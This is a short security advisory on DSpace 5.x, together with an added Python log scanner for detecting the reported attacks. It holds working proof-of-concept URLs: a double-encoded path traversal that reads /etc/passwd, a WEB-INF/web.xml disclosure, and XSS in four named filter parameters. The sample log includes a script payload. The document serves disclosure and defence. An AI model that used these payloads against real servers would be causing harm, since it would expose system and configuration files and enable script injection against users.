DSpace 5.x suffers from several vulnerabilities, including XSS, Path Traversal
Exploit Title: Dspace Multiple Vulnerabilities
XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface
This version suffers from a Path Traversal vulnerability; to exploit it I used double encoding for the dot (.),
so the ../ will be %252e%252e/
POC :
http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
JSPUI (JSP) - traditional JSP-based interface
A. Path Traversal Vulnerability
The first vulnerability in this version allows reading files on the server.
POC :
http://TARGET/handle/10673/1/WEB-INF/web.xml
B. Cross Site Scripting (XSS) Vulnerability
The second vulnerability in this version allows executing arbitrary script and displaying arbitrary content in a victim user's browser.
The vulnerability exists in several request parameters:
- filtertype
- filter_type_1
- filtername
- filter_field_1
None of the above parameters is sanitized correctly.
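Detection logic for the three issues above, written from the defender's side as an added example (not part of the advisory or of DSpace): it scans constructed access-log lines, undoes repeated percent-encoding so %252e%252e becomes ../, flags traversal and WEB-INF access in the request path, and flags script markers in the four filter parameters. The log lines and the /jspui/simple-search path are constructed assumptions, not values from the advisory.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (assumption: the endpoint path is made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /xmlui/static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1234
10.0.0.6 - - [01/Jan/2016:10:00:01 +0000] "GET /jspui/handle/10673/1/WEB-INF/web.xml HTTP/1.1" 200 5678
10.0.0.7 - - [01/Jan/2016:10:00:02 +0000] "GET /jspui/simple-search?filtertype=%3Cscript%3Ealert(1)%3C/script%3E&filter_field_1=author HTTP/1.1" 200 910
10.0.0.8 - - [01/Jan/2016:10:00:03 +0000] "GET /jspui/handle/10673/1 HTTP/1.1" 200 4321
"""

# The four JSPUI parameters named in the advisory.
WATCHED_PARAMS = {"filtertype", "filter_type_1", "filtername", "filter_field_1"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')
XSS_RE = re.compile(r'<\s*/?\s*(?:script|img|svg|iframe)|javascript:|on\w+\s*=', re.I)

def fully_decode(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so '%252e' ends up as '.'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line):
    """Return finding tags for one access-log line (empty list if nothing matched)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = fully_decode(url.path)          # decode before matching, or %252e slips past
    findings = []
    if TRAVERSAL_RE.search(path):
        findings.append("path-traversal")
    if "/WEB-INF" in path.upper():         # handle/<prefix>/<id>/WEB-INF/web.xml style
        findings.append("web-inf-access")
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name in WATCHED_PARAMS and any(XSS_RE.search(fully_decode(v)) for v in values):
            findings.append("xss:" + name)
    return findings

def scan(log_text):
    """Map 1-based line number -> findings for every suspicious line."""
    results = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            results[n] = tags
    return results
```

Running `scan(SAMPLE_LOG)` tags lines 1 to 3 and leaves the ordinary handle request untouched; the same checks belong in a WAF rule or reverse-proxy filter in front of an unpatched instance.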
PATCH :
DSpace team announcement article:
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html